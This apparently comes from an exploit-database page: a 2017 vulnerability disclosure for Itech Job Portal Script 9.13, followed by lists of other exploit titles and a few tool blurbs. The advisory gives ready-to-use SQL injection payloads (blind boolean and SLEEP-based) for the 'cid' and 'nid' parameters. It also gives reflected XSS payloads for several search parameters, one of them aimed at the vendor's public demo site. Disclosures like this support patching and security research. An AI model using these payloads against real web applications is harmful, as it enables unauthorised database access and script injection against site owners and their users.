Menu

Search for hundreds of thousands of exploits

"Itech Job Portal Script 9.13 - Multiple Vulnerabilities"

Author

Exploit author

Th3GundY

Platform

Exploit platform

php

Release date

Exploit published date

2017-02-04

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
# Exploit Title 	:  Itech Job Portal Script - Multiple Vulnerabilities
# Author 		:  Yunus YILDIRIM (Th3GundY)
# Team 			:  CT-Zer0 (@CRYPTTECH) - https://www.crypttech.com
# Website 		:  http://www.yunus.ninja
# Contact 		:  yunusyildirim@protonmail.com

# Vendor Homepage 	: http://itechscripts.com/
# Software Link  	: http://itechscripts.com/job-portal-script/
# Vuln. Version	  	: 9.13
# Demo			: http://job-portal.itechscripts.com/


# # # #  DETAILS  # # # # 

SQL Injections :

# 1
http://localhost/career_advice_details.php?cid=5
    Parameter: cid (GET)
        Type: boolean-based blind
        Title: AND boolean-based blind - WHERE or HAVING clause
        Payload: cid=5' AND 7504=7504-- zpmu

        Type: AND/OR time-based blind
        Title: MySQL >= 5.0.12 OR time-based blind (comment)
        Payload: cid=5' OR SLEEP(5)#

# 2
http://localhost/news_details_us.php?nid=1
    Parameter: nid (GET)
        Type: boolean-based blind
        Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause
        Payload: nid=1' RLIKE (SELECT (CASE WHEN (2796=2796) THEN 1 ELSE 0x28 END))-- WmMl

        Type: AND/OR time-based blind
        Title: MySQL >= 5.0.12 OR time-based blind
        Payload: nid=1' OR SLEEP(5)-- UoUN

# # # # # # # # # # # # # # # # # # # # # # # # 

Cross site scriptings (XSS) :

# 1
http://localhost/search_result_alluser.php?function="><svg/onload=prompt('CT-Zer0');>
    Parameter: function (GET)
    Payload: "><svg/onload=prompt('CT-Zer0');>

# 2
http://localhost/search_result_alluser.php?ind="><svg/onload=prompt('CT-Zer0');>
    Parameter: ind (GET)
    Payload: "><svg/onload=prompt('CT-Zer0');>

# 3
http://localhost/search_result_alluser.php?loc="><svg/onload=prompt('CT-Zer0');>
    Parameter: loc (GET)
    Payload: "><svg/onload=prompt('CT-Zer0');>

# 4
http://localhost/search_result_alluser.php?compid="><svg/onload=prompt('CT-Zer0');>
    Parameter: compid (GET)
    Payload: "><svg/onload=prompt('CT-Zer0');>

# 5
http://job-portal.itechscripts.com/search_result_alluser.php?days_chk="><svg/onload=prompt('CT-Zer0');>
    Parameter: days_chk (GET)
    Payload: "><svg/onload=prompt('CT-Zer0');>
Release Date Title Type Platform Author
2020-12-02 "aSc TimeTables 2021.6.2 - Denial of Service (PoC)" local windows "Ismael Nava"
2020-12-02 "Anuko Time Tracker 1.19.23.5311 - No rate Limit on Password Reset functionality" webapps php "Mufaddal Masalawala"
2020-12-02 "Ksix Zigbee Devices - Playback Protection Bypass (PoC)" remote multiple "Alejandro Vazquez Vazquez"
2020-12-02 "Mitel mitel-cs018 - Call Data Information Disclosure" remote linux "Andrea Intilangelo"
2020-12-02 "ChurchCRM 4.2.0 - CSV/Formula Injection" webapps multiple "Mufaddal Masalawala"
2020-12-02 "Artworks Gallery 1.0 - Arbitrary File Upload RCE (Authenticated) via Edit Profile" webapps multiple "Shahrukh Iqbal Mirza"
2020-12-02 "ChurchCRM 4.2.1 - Persistent Cross Site Scripting (XSS)" webapps multiple "Mufaddal Masalawala"
2020-12-02 "DotCMS 20.11 - Stored Cross-Site Scripting" webapps multiple "Hardik Solanki"
2020-12-02 "NewsLister - Authenticated Persistent Cross-Site Scripting" webapps multiple "Emre Aslan"
2020-12-02 "IDT PC Audio 1.0.6433.0 - 'STacSV' Unquoted Service Path" local windows "Manuel Alvarez"
Release Date Title Type Platform Author
2020-05-28 "QNAP QTS and Photo Station 6.0.3 - Remote Command Execution" webapps php Th3GundY
2017-02-13 "PHP Marketplace Script - SQL Injection" webapps php Th3GundY
2017-02-04 "Itech Job Portal Script 9.13 - Multiple Vulnerabilities" webapps php Th3GundY
2017-02-03 "Itech Multi Vendor Script 6.49 - SQL Injection" webapps php Th3GundY
2016-11-18 "FTPShell Client 5.24 - 'PWD' Remote Buffer Overflow" remote windows Th3GundY
2016-10-07 "BlueStacks 2.5.55 - Unquoted Service Path Privilege Escalation" local windows Th3GundY
2016-10-06 "Comodo Chromodo Browser - Unquoted Service Path Privilege Escalation" local windows Th3GundY
2016-10-06 "Comodo Dragon Browser - Unquoted Service Path Privilege Escalation" local windows Th3GundY
import requests
response = requests.get('http://127.0.0.1:8181?format=json')

For full documentation follow the link above

Cipherscan. Find out which SSL ciphersuites are supported by a target.

Identify and fingerprint Web Application Firewall (WAF) products protecting a website.